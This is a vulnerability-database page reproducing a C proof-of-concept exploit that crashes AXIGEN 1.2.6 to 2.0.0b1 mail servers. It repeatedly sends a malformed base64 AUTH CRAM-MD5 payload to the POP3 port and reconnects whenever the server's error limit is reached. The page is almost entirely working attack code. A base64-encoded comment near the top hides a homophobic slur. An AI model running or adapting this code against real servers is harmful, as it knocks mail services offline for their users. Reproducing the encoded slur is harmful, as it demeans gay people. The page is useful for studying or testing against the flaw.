Vulners
Lucene search
axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
/* doaxigen.c
*
* axigen 1.2.6 - 2.0.0b1 DoS (x86-lnx)
* by mu-b - Sat Oct 22 2006
*
* - Tested on: AXIGEN 1.2.6 (lnx)
* AXIGEN 2.0.0b1 (lnx)
*
* 0x08088054: parsing error results in DoS (little-endian, confirmed)
* DoS + off-by-one heap smash (big-endian)
*
* Note: if you receive a SIGPIPE then you crashed the server
* but at too high a memory address... try again.
*/
/* dGFicyBhcmUgZm9yIGZhZ2dvdHNcIQ== */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/time.h>
#include <sys/types.h>
#define BUF_SIZE 1024
#define BBUF_SIZE BUF_SIZE/3*4+1
#define AUTH_CMD "AUTH CRAM-MD5\r\n"
#define QUIT_CMD "QUIT\r\n"
#define DEF_PORT 110
#define PORT_POP3 DEF_PORT
#define RCNT_DELAY 3
static const char base64tab[] =
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
static int base64 (const u_char * ibuf, u_char * obuf, size_t n);
static int sock_send (int sock, u_char * src, int len);
static int sock_recv (int sock, u_char * dst, int len);
static void zhammer (u_char * host);
static int
base64 (const u_char * ibuf, u_char * obuf, size_t n)
{
int a, b, c;
int i, j;
int d, e, f, g;
a = b = c = 0;
for (j = i = 0; i < n; i += 3)
{
a = (u_char) ibuf[i];
b = i + 1 < n ? (u_char) ibuf[i + 1] : 0;
c = i + 2 < n ? (u_char) ibuf[i + 2] : 0;
d = base64tab[a >> 2];
e = base64tab[((a & 3) << 4) | (b >> 4)];
f = base64tab[((b & 15) << 2) | (c >> 6)];
g = base64tab[c & 63];
if (i + 1 >= n)
f = '=';
if (i + 2 >= n)
g = '=';
obuf[j++] = d, obuf[j++] = e;
obuf[j++] = f, obuf[j++] = g;
}
obuf[j++] = '\0';
return strlen (obuf);
}
static int
sock_send (int sock, u_char * src, int len)
{
int sbytes;
sbytes = send (sock, src, len, 0);
return (sbytes);
}
static int
sock_recv (int sock, u_char * dst, int len)
{
int rbytes;
rbytes = recv (sock, dst, len, 0);
if (rbytes >= 0)
dst[rbytes] = '\0';
return (rbytes);
}
static int
sockami (u_char * host, int port)
{
struct sockaddr_in address;
struct hostent *hp;
int sock;
fflush (stdout);
if ((sock = socket (AF_INET, SOCK_STREAM, 0)) == -1)
{
perror ("socket()");
exit (-1);
}
if ((hp = gethostbyname (host)) == NULL)
{
perror ("gethostbyname()");
exit (-1);
}
memset (&address, 0, sizeof (address));
memcpy ((char *) &address.sin_addr, hp->h_addr, hp->h_length);
address.sin_family = AF_INET;
address.sin_port = htons (port);
if (connect (sock, (struct sockaddr *) &address, sizeof (address)) == -1)
{
perror ("connect()");
exit (EXIT_FAILURE);
}
return (sock);
}
static void
zhammer (u_char * host)
{
int sock, rbytes;
u_int i;
u_char *md5 = "\" d339490346794f964736669ae26e29df"; /* what was that? */
u_char sbuf[BBUF_SIZE], *sptr;
u_char rbuf[BUF_SIZE];
fd_set r_fds;
struct timeval tv;
base64 (md5, sbuf, strlen (md5));
sptr = sbuf + strlen (sbuf);
*sptr++ = '\r', *sptr++ = '\n', *sptr = '\0';
printf ("+Connecting to %s:%d.", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
return;
for (i = 0; i < -1; i++)
{
int rbytes;
sock_send (sock, AUTH_CMD, strlen (AUTH_CMD));
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
if (rbytes < 0)
break;
sock_send (sock, sbuf, strlen (sbuf));
FD_ZERO (&r_fds);
FD_SET (sock, &r_fds);
tv.tv_sec = 4; /* wait 4 seconds */
tv.tv_usec = 0;
rbytes = select (sock + 1, &r_fds, NULL, NULL, &tv);
if (rbytes == -1) /* oh dear */
perror ("select()");
else if (rbytes) /* read response */
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
else /* timeout, server appears to have crashed!@$%! */
break;
/* hmmm, too many attempts, must re-connect... */
if (strstr (rbuf, "(maximum number of protocol errors reached)"))
{
close (sock);
sleep (RCNT_DELAY);
printf ("\n+Reconnecting to %s:%d.", host, PORT_POP3);
sock = sockami (host, PORT_POP3);
rbytes = sock_recv (sock, rbuf, sizeof (rbuf) - 1);
}
if (rbytes < 0)
break;
if (!((i + 1) % 4))
printf ("..%d", i + 1);
fflush (stdout);
usleep (1000);
}
printf ("\n");
}
int
main (int argc, char **argv)
{
printf ("axigen 1.2.6 - 2.0.0b1 DoS POC\n"
"by: <[email protected]>, <[email protected]>\n\n");
if (argc <= 1)
{
fprintf (stderr, "Usage: %s <host>\n", argv[0]);
exit (EXIT_SUCCESS);
}
zhammer (argv[1]);
printf ("+Wh00t!\n");
return (EXIT_SUCCESS);
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Feb 2007 00:00Current
7.1High risk
Vulners AI Score7.1